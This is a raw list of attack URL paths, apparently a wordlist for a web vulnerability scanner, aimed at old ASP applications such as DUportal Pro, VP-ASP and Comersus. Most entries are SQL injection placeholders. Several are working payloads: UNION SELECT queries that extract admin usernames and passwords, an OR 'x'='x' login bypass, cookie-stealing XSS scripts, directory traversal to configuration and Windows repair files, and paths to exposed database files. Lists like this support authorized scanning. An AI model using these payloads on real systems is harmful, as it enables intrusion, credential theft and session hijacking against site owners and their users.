/dUpro/Classifieds/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Classifieds/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/Classifieds/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/Classifieds/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/Events/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/events/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/Events/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/events/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/Events/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/events/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/Events/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/events/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/Events/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/events/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/Events/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/events/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/Events/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/events/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/Events/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/events/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/Events/../events/default.asp?iChannel=6&iDate=3%2f19%2f2005&nChannel='SQL_INJECTION
/dUpro/events/../events/default.asp?iChannel=6&iDate=3%2f19%2f2005&nChannel='SQL_INJECTION
/dUpro/Events/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/events/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/Events/../events/default.asp?iChannel='SQL_INJECTION&iDate=3%2f19%2f2005&nChannel=Events
/dUpro/events/../events/default.asp?iChannel='SQL_INJECTION&iDate=3%2f19%2f2005&nChannel=Events
/dUpro/Events/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/events/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/Events/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/events/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/Events/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/events/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/Events/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/events/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/Events/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/events/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/Events/../News/default.asp?iChannel=1&nChannel='SQL_INJECTION
/dUpro/events/../News/default.asp?iChannel=1&nChannel='SQL_INJECTION
/dUpro/Events/../News/default.asp?iChannel='SQL_INJECTION&nChannel=News
/dUpro/events/../News/default.asp?iChannel='SQL_INJECTION&nChannel=News
/dUpro/Events/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/events/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/Events/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/events/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Events/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/events/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/Events/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/events/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Events/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/events/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/Events/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/events/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/Events/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/events/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/Files/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/Files/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/Files/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/Files/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/Files/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/Files/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/Files/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/Files/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/Files/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/Files/../events/default.asp?iChannel=6&nChannel='SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/Files/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/Files/../events/default.asp?iChannel='SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/Files/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/Files/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/Files/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/Files/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/Files/../News/default.asp?iChannel=1&nChannel='SQL_INJECTION
/dUpro/Files/../News/default.asp?iChannel='SQL_INJECTION&nChannel=News
/dUpro/Files/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/Files/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Files/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/Files/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Files/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/Files/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/Files/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/home/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/home/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/home/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/home/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/home/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/home/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/home/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/home/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/home/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/home/../events/default.asp?iChannel=6&nChannel='SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/home/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/home/../events/default.asp?iChannel='SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/home/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/home/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/home/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/home/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/home/../News/default.asp?iChannel=1&nChannel='SQL_INJECTION
/dUpro/home/../News/default.asp?iChannel='SQL_INJECTION&nChannel=News
/dUpro/home/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/home/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/home/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/home/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/home/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/home/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/Pictures/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/Pictures/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/Pictures/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/Pictures/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/Pictures/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/Pictures/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/Pictures/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/Pictures/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/Pictures/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/Pictures/../events/default.asp?iChannel=6&nChannel='SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/Pictures/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/Pictures/../events/default.asp?iChannel='SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/Pictures/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/Pictures/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/Pictures/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/Pictures/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/Pictures/../News/default.asp?iChannel=1&nChannel='SQL_INJECTION
/dUpro/Pictures/../News/default.asp?iChannel='SQL_INJECTION&nChannel=News
/dUpro/Pictures/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/Pictures/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Pictures/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/Pictures/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Pictures/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/Pictures/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/Pictures/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/polls/../polls/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/polls/../polls/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/polls/../polls/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/polls/../polls/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/polls/../polls/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../events/default.asp?iChannel=6&nChannel='SQL_INJECTION&iDate=4%2f1%2f2005
/dUpro/polls/../polls/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/polls/../polls/../events/default.asp?iChannel='SQL_INJECTION&nChannel=Events&iDate=4%2f1%2f2005
/dUpro/polls/../polls/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/polls/../polls/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/polls/../polls/../News/default.asp?iChannel=1&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../News/default.asp?iChannel='SQL_INJECTION&nChannel=News
/dUpro/polls/../polls/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/polls/../polls/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/polls/../polls/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/polls/../polls/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/polls/../polls/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/polls/../polls/default.asp?iChannel=&nChannel='SQL_INJECTION
/dUpro/polls/../polls/default.asp?iChannel='SQL_INJECTION&nChannel=
/dUpro/Topics/../Articles/default.asp?iChannel=2&nChannel='SQL_INJECTION
/dUpro/Topics/../Articles/default.asp?iChannel='SQL_INJECTION&nChannel=Articles
/dUpro/Topics/../Businesses/default.asp?iChannel=18&nChannel='SQL_INJECTION
/dUpro/Topics/../Businesses/default.asp?iChannel='SQL_INJECTION&nChannel=Businesses
/dUpro/Topics/../Classifieds/default.asp?iChannel=7&nChannel='SQL_INJECTION
/dUpro/Topics/../Classifieds/default.asp?iChannel='SQL_INJECTION&nChannel=Classifieds
/dUpro/Topics/../Entertainments/default.asp?iChannel=19&nChannel='SQL_INJECTION
/dUpro/Topics/../Entertainments/default.asp?iChannel='SQL_INJECTION&nChannel=Entertainments
/dUpro/Topics/../Events/default.asp?iChannel=6&nChannel='SQL_INJECTION
/dUpro/Topics/../Events/default.asp?iChannel='SQL_INJECTION&nChannel=Events
/dUpro/Topics/../Files/default.asp?iChannel=4&nChannel='SQL_INJECTION
/dUpro/Topics/../Files/default.asp?iChannel='SQL_INJECTION&nChannel=Files
/dUpro/Topics/../Links/default.asp?iChannel=5&nChannel='SQL_INJECTION
/dUpro/Topics/../Links/default.asp?iChannel='SQL_INJECTION&nChannel=Links
/dUpro/Topics/../News/default.asp?iChannel=1&nChannel='SQL_INJECTION
/dUpro/Topics/../News/default.asp?iChannel='SQL_INJECTION&nChannel=News
/dUpro/Topics/../Pictures/default.asp?iChannel=3&nChannel='SQL_INJECTION
/dUpro/Topics/../Pictures/default.asp?iChannel='SQL_INJECTION&nChannel=Pictures
/dUpro/Topics/../Polls/default.asp?iChannel=15&nChannel='SQL_INJECTION
/dUpro/Topics/../Polls/default.asp?iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Topics/../Products/default.asp?iChannel=8&nChannel='SQL_INJECTION
/dUpro/Topics/../Products/default.asp?iChannel='SQL_INJECTION&nChannel=Products
/dUpro/Topics/../topics/default.asp?iChannel='SQL_INJECTION&nChannel=
/dUpro/Topics/../Topics/default.asp?iChannel='SQL_INJECTION&nChannel=Topics
/dUpro/Businesses/../events/default.asp?iChannel=6&nChannel=Events&iDate='SQL_ERRORS
/dUpro/Businesses/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/Classifieds/../events/default.asp?iChannel=6&nChannel=Events&iDate='SQL_ERRORS
/dUpro/Classifieds/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/Events/../events/default.asp?iChannel=6&iDate='SQL_ERRORS&nChannel=Events
/dUpro/events/../events/default.asp?iChannel=6&iDate='SQL_ERRORS&nChannel=Events
/dUpro/Events/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/events/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/Files/../events/default.asp?iChannel=6&nChannel=Events&iDate='SQL_ERRORS
/dUpro/Files/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/home/../events/default.asp?iChannel=6&nChannel=Events&iDate='SQL_ERRORS
/dUpro/home/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/Pictures/../events/default.asp?iChannel=6&nChannel=Events&iDate='SQL_ERRORS
/dUpro/Pictures/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/polls/../polls/../events/default.asp?iChannel=6&nChannel=Events&iDate='SQL_ERRORS
/dUpro/polls/../polls/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/Topics/../topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/dUpro/Topics/../Topics/default.asp?iChannel=16&nChannel='SQL_ERRORS
/Calendar/defer.asp?Event_ID='&Occurr_ID=0
/[path]/viewDetails.asp?pid=[HERE]
/listings.asp?peopleID='[sql]
/listings.asp?sort_order='[sql]
/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
/default.asp?pg=pgLogon&dest=[XSS]
/default.asp?view=alpha&AlphaSort=[SQL Injection]
//default.asp?In=[SQL Injection]
/default.asp?view=All&orderby=[SQL Injection]
/default.asp?Action=Search&Keyword=<script>alert("xssed")</script>
/[path]/default.asp?catID=-1%20union%20select%200,kullanici,eposta,3,4,5,sifre,7,8,9,10,11,12,13%20from%20uyeler
/prequiz.asp?examid=1&exam=[XSS]
/cgi-bin/store/__SQLUSER__
/addlisting.asp?cat=[xss]
/[Path]/messages.asp?forum_id=3&message_id=[SQL]
/content.asp?CatId=&ContentType=&keywords=r0t&search=%3E&do_search=[XSS]
/content.asp?CatId=&ContentType=&keywords=r0t&search=[XSS]
/toast.asp?action=posts&sub=search&fid=-1&author=[XSS]
/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=[XSS]
/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=&message=[XSS]
/toast.asp?action=posts&sub=search&fid=-1&author=r0t&subject=&message=&dayprune=[XSS]
/midiscovery/ErrLog/mi3errors.log
/account_login.asp?Username=[XSS]
/account_login.asp?Password=[XSS]
/path/SayfalaAltList.asp?ID=-1 UNION ALL SELECT 0,kullaniciadi,sifre FROM uyeler
/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin')
/?page=Search
/default.aspx?page=Search&app=Search&srch=[sql]
/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"
/default.asp?ExecuteTheLogin=1&Users_Email=anything%27+OR+%27x%27%3D%27x&Users_Password=anything%27+OR+%27x%27%3D%27x
/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20
/mcart2sqluk/searchAction.asp?chkText='SQL_INJECTION&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText='SQL_INJECTION&chkPrice=yes&intPrice=all&chkCat=yes&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice='SQL_INJECTION&intPrice=all&chkCat=yes&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice='SQL_INJECTION&chkCat=yes&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat='SQL_INJECTION&strCat=1
/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat='SQL_INJECTION
/gallery/igallery.asp?d=%5c../../%5c
/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar
/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss]
/[Path]/home/[email protected]&[email protected]&[email protected]&address=</textarea><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&[email protected]&state=0&hide_email=on&[email protected]&Submit=SignUp&addit=start
/index.asp?id=<script>("xss")</script>
/path/product.asp?productid=[SQL INJECTION]
/forum/default.asp?db=general&mode=download&idx=507&fileNum=1&filename=../conf.asp&nav=viewcontents&srhctgr=&srhstr=&page=1
/category_news.asp?ID='[SQL]
/comersus/backofficeLite/comersus_backoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>
/filename.asp?QUERY=[XSS]&Submit=Search%21&ACTION=SEARCH
/more.asp?ID='[SQL query]
/searchmain.asp?I1=1&area=all&cat=[xss]
/view_gallery.asp?gallery_id=809¤tpage=[SQL Injection]
/view_gallery.asp?gallery_id=[SQL injection]
/download_image.asp?image_id=[SQL Injection]
/gallery.asp?currentpage=[SQL Injection]
/view_recent.asp?currentpage=[SQL Injection]
/gallery.asp?currentpage=2&orderby=[SQL Injection]
/idealbb/error.asp?e=16&sessionID={xxxxxxxx-xxxx-xxxx-
/DUclassmate/admin/edit.asp?iPro=[SQL Inject]
/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,username,3+from+admin
/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,password,3+from+admin
/products/bsearch.asp?b_search=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7
/dUpro/Businesses/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Businesses/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Classifieds/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Events/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/events/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Events/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/events/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Files/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Files/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/home/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/home/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Pictures/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Pictures/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/polls/../polls/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Topics/../polls/result.asp?iData=74&iCat=254&iChannel='SQL_INJECTION&nChannel=Polls
/dUpro/Topics/../polls/result.asp?iData='SQL_INJECTION&iCat=254&iChannel=15&nChannel=Polls
/dUpro/Businesses/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/Businesses/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Classifieds/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/Classifieds/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Events/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/events/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/Events/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/events/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Files/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/Files/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/home/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/home/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Pictures/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/Pictures/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/polls/../polls/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/dUpro/Topics/../polls/result.asp?iData=74&iCat=254&iChannel=15&nChannel='SQL_ERRORS
/dUpro/Topics/../polls/result.asp?iData=74&iCat='SQL_ERRORS&iChannel=15&nChannel=Polls
/buscar.asp?p=[XSS]
/login.asp?SessionID=[SQL]
/cat.asp?keywords=[XSS]
/admin/hosting/plandetails.asp?hostcustid=[PlanID]
/demo/owoslite/default.asp?show="><script>alert(document.cookie);</script>
/demo/owoslite/login.asp?go="><script>alert(document.cookie);</script>
/demo/owoslite/report.asp?show="><script>alert(document.cookie);</script>
/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E
/vie/viewtopic.asp?forumid=48&id=2736'
/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/
/forum1/post.aspx?action=reply&threadid="><script>alert(/liscker/);</script>
/path/listpics.asp?a=show&ID=[SQL INJECTION]
/forum1/post.aspx?action=newthread"><script>alert(/liscker/)</script>
/hava.asp?il=[Xss]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort=DESC&cat=0&menuSelect=1&type=1&city=1&minprice=[xss]
/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='"><script>alert(document.cookie)</script>
/path/default.asp?page=[SQL INJECTION]
/forum/ZixForum.mdb
/demos/DUportalPro34Demo/home/password.asp?result=[XSS]
/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=[SQL]&action=view
/[path to script]/login.asp
/d/asp/SelGruFra.asp" METHOD=post>
/UblogReload/index.asp?ci='62&s=category
/UblogReload/index.asp?d=11'&m=6&y=2005&s=day
/UblogReload/index.asp?m=6'&y=2005&s=month
/admin//accounts/UserProfile.asp?action=updateprofile"
/Forums-Path/Members1.aspx?Username=[xss]
/Forums-Path/Members1.aspx?Update=[xss]
/default.asp?skin_number=[XSS]
/path/default.asp?page=2&order=[SQL Injection]
/www.example.com/target/path/default.asp?page=[SQL INJECTION]&order=id
/default.asp?gb=urun&id=18&ortak="<h1>Patriotic%20Hackers<h1>
/default.asp?gb=kate&kat=<script>alert(document.cookie</script>&ortak=
/default.asp?gb=kate&kat=<script>alert(document.title)</script>&ortak=
/default.asp?gb=kate&kat=AnaKart&ortak="><script>alert(document.cookie)</script>
/default.asp?Page=2&Email=[SQL]&Password=pass&Password2=pass&FirstName=name&LastName=lastname&MailType=0
/activeauctionsuperstore/default.asp?Sortby=ItemName&SortDir='SQL_INJECTION
/activeauctionsuperstore/default.asp?Sortby='SQL_INJECTION
/aspbb/topic.asp?TID=[sql injection]
/aspbb/topic.asp?COMMAND=GOTOLAST&TID=[sql injection]
/eshopv-8/productsByCategory.asp?intCatalogID=&%3bpage=2&%3bstrCatalog_NAME='SQL_INJECTION
/mcart2pal/productsByCategory.asp?intCatalogID=&%3bpage=2&%3bstrCatalog_NAME='SQL_INJECTION
/default.asp?sec=1&ma1="><script>alert("XSS");</script>
/default.asp?sec=1&tag="><script>alert("XSS");</script>
/default.asp?sec=1&ma2="><script>alert("XSS");</script>
/default.asp?sec=33&ma1=forgotpass
/[path]/login.asp?username=[SQL COMMAND]
/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
/path/index.asp?cat=[SQL INJECTION]
/path/index.asp?page=detail&did=[SQL INJECTION]
/asp/listings.asp?s=</textarea>'"><script>alert(document.cookie)</script>
/megabbs/forums/thread-post.asp?action=writenew&fid=%0
/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
/ScriptPath/listmain.asp?cat=<script>alert(document.cookie);</script>
/gallery/folderview.asp?folder=Sport+Champions/../../../../../../../../winnt/repair
